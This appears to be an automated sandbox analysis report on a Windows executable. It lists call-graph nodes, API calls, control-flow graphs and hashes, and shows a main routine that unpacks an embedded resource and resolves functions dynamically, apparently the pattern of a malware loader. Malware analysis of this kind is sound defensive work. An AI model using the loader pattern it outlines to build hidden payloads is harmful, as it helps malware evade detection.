13852->13853 13853->13770 13854 40b6b5 __output_l 63 API calls 13854->13853 13855->13853 13855->13854 13856 40ffd3 ReadFile 13858 40fff1 GetLastError 13856->13858 13856->13867 13857 4101fb ReadFile 13859 41021a GetLastError 13857->13859 13857->13865 13858->13867 13859->13865 13861 410138 GetLastError 13861->13843 13862 4100cb 13869 410088 MultiByteToWideChar 13862->13869 13871 414f8f __lseeki64_nolock 65 API calls 13862->13871 13863 4100be 13866 40bfc1 __output_l 63 API calls 13863->13866 13864 410050 13864->13855 13864->13862 13864->13863 13864->13869 13865->13855 13865->13857 13868 414f8f __lseeki64_nolock 65 API calls 13865->13868 13866->13855 13867->13856 13867->13864 13870 414f8f __lseeki64_nolock 65 API calls 13867->13870 13868->13865 13869->13855 13869->13861 13870->13867 13871->13869 13907 415639 LeaveCriticalSection 13872->13907 13874 4103ef 13874->13774 13878 40d606 LeaveCriticalSection 13875->13878 13877 415637 13877->13800 13878->13877 13894 415522 13879->13894 13881 414fad 13882 414fb5 13881->13882 13883 414fc6 SetFilePointer 13881->13883 13884 40bfc1 __output_l 63 API calls 13882->13884 13885 414fde GetLastError 13883->13885 13887 414fba 13883->13887 13884->13887 13886 414fe8 13885->13886 13885->13887 13888 40bfe7 __dosmaperr 63 API calls 13886->13888 13887->13839 13888->13887 13890 40bfd4 __lseeki64 63 API calls 13889->13890 13891 40bff2 _realloc 13890->13891 13892 40bfc1 __output_l 63 API calls 13891->13892 13893 40c005 13892->13893 13893->13855 13895 415547 13894->13895 13896 41552f 13894->13896 13899 40bfd4 __lseeki64 63 API calls 13895->13899 13901 41558c 13895->13901 13897 40bfd4 __lseeki64 63 API calls 13896->13897 13898 415534 13897->13898 13900 40bfc1 __output_l 63 API calls 13898->13900 13902 415575 13899->13902 13903 41553c 13900->13903 13901->13881 13904 40bfc1 __output_l 63 API calls 13902->13904 13903->13881 13905 41557c 13904->13905 13906 40e744 __output_l 6 API calls 13905->13906 13906->13901 13907->13874 13909 411c75 __malloc_crt 63 API calls 13908->13909 13910 415142 13909->13910 13910->13781 13912 40fbcc LeaveCriticalSection 13911->13912 13913 40fbad 13911->13913 13912->13729 13913->13912 13914 40fbb4 13913->13914 13917 40d606 LeaveCriticalSection 13914->13917 13916 40fbc9 13916->13729 13917->13916 13919 404f96 13918->13919 13926 404fd5 13918->13926 13920 40bfc1 __output_l 63 API calls 13919->13920 13924 404fe7 13919->13924 13921 404fa1 13920->13921 13922 40bf62 __fread_nolock 77 API calls 13921->13922 13923 404fbb 13922->13923 13923->13924 13925 40bc8e _ferror 63 API calls 13923->13925 13924->13671 13925->13926 13926->13671 14504 4054b0 14505 4053f0 99 API calls 14504->14505 14506 4054c1 14505->14506 14507 4054d1 14506->14507 14509 40c385 14506->14509 14510 40c391 __fcloseall 14509->14510 14511 40c3a1 14510->14511 14512 40c398 14510->14512 14514 40fb29 __lock_file 64 API calls 14511->14514 14520 40c2ab 14512->14520 14515 40c3a9 14514->14515 14530 40c263 14515->14530 14518 40c39e __fcloseall 14518->14507 14521 40c2b7 __fcloseall 14520->14521 14522 40d6e0 __lock 63 API calls 14521->14522 14529 40c2c6 14522->14529 14523 40c35e 14551 40c37c 14523->14551 14526 40c36a __fcloseall 14526->14518 14528 40c263 101 API calls __fflush_nolock 14528->14529 14529->14523 14529->14528 14543 40fb6a 14529->14543 14548 40c34d 14529->14548 14531 40c270 14530->14531 14532 40c279 14530->14532 14533 40c2ab _flsall 101 API calls 14531->14533 14534 40c1fb __flush 97 API calls 14532->14534 14536 40c276 14533->14536 14535 40c27f 14534->14535 14535->14536 14537 40fa20 __fileno 63 API calls 14535->14537 14540 40c3ce 14536->14540 14538 40c298 14537->14538 14561 4117e3 14538->14561 14541 40fb9c _fputc 2 API calls 14540->14541 14542 40c3d6 14541->14542 14542->14518 14544 40fb77 14543->14544 14545 40fb8d EnterCriticalSection 14543->14545 14546 40d6e0 __lock 63 API calls 14544->14546 14545->14529 14547 40fb80 14546->14547 14547->14529 14554 40fbd8 14548->14554 14550 40c35b 14550->14529 14560 40d606 LeaveCriticalSection 14551->14560 14553 40c383 14553->14526 14555 40fbe8 14554->14555 14556 40fbfb LeaveCriticalSection 14554->14556 14559 40d606 LeaveCriticalSection 14555->14559 14556->14550 14558 40fbf8 14558->14550 14559->14558 14560->14553 14562 4117ef __fcloseall 14561->14562 14563 4117f7 14562->14563 14564 41180a 14562->14564 14565 40bfc1 __output_l 63 API calls 14563->14565 14566 411818 14564->14566 14569 411852 14564->14569 14572 4117fc __fcloseall 14565->14572 14567 40bfc1 __output_l 63 API calls 14566->14567 14568 41181d 14567->14568 14570 40e744 __output_l 6 API calls 14568->14570 14571 415599 ___lock_fhandle 64 API calls 14569->14571 14570->14572 14573 411858 14571->14573 14572->14536 14574 411891 14573->14574 14575 415522 __lseek_nolock 63 API calls 14573->14575 14576 40bfc1 __output_l 63 API calls 14574->14576 14577 41186d FlushFileBuffers 14575->14577 14578 41189b 14576->14578 14579 411884 14577->14579 14580 411879 GetLastError 14577->14580 14583 4118ba 14578->14583 14579->14578 14582 40bfd4 __lseeki64 63 API calls 14579->14582 14580->14579 14582->14574 14586 415639 LeaveCriticalSection 14583->14586 14585 4118c2 14585->14572 14586->14585

                                                                                                                                      Executed Functions

                                                                                                                                      Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 87 4021aa-4021c0 49->87 50->49 52 401d10-401d2e call 401650 51->52 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 86 401dad-401dbd Module32Next 81->86 83->79 85 401d92-401d9a 83->85 84->81 85->77 85->84 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 #8 call 401870 #8 call 4018d0 103->106 114 4022c3-40232a call 4018d0 #15 #23 call 40b350 #24 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 #16 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 #411 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 141 4023b6-4023b8 140->141 142 4023ba 140->142 144 4023bc-402417 #9 * 2 call 4019a0 141->144 142->144 146 40241c-40242c #9 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                      APIs
                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                      • API String ID: 1430744539-2962942730
                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                      Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 152 4018f0-4018fa 153 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 152->153 154 4018fc-401900 152->154 157 401940-401949 GetLastError 153->157 158 401996-40199a 153->158 159 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 157->159 160 40198d-40198f 157->160 159->160 160->158 162 401991 call 401030 160->162 162->158
                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                      Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 165 40af66-40af6e 166 40af7d-40af88 call 40b84d 165->166 169 40af70-40af7b call 40d2e3 166->169 170 40af8a-40af8b 166->170 169->166 173 40af8c-40af98 169->173 174 40afb3-40afca call 40af49 call 40cd39 173->174 175 40af9a-40afb2 call 40aefc call 40d2bd 173->175 175->174
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                      Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 184 40e7ee-40e7f6 call 40e7c3 186 40e7fb-40e7ff ExitProcess 184->186
                                                                                                                                      APIs
                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                      Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 187 401870-401883 call 40af66 190 4018b2 187->190 191 401885-4018a2 SysAllocString 187->191 192 4018b4-4018b8 190->192 191->192 193 4018a4-4018a6 191->193 195 4018c4-4018c9 192->195 196 4018ba-4018bf call 40ad90 192->196 193->192 194 4018a8-4018ad call 40ad90 193->194 194->190 196->195
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                      Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 199 40d534-40d556 HeapCreate 200 40d558-40d559 199->200 201 40d55a-40d563 199->201
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                      Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 202 40ea0a-40ea16 call 40e8de 204 40ea1b-40ea1f 202->204
                                                                                                                                      APIs
                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                      Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                      Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
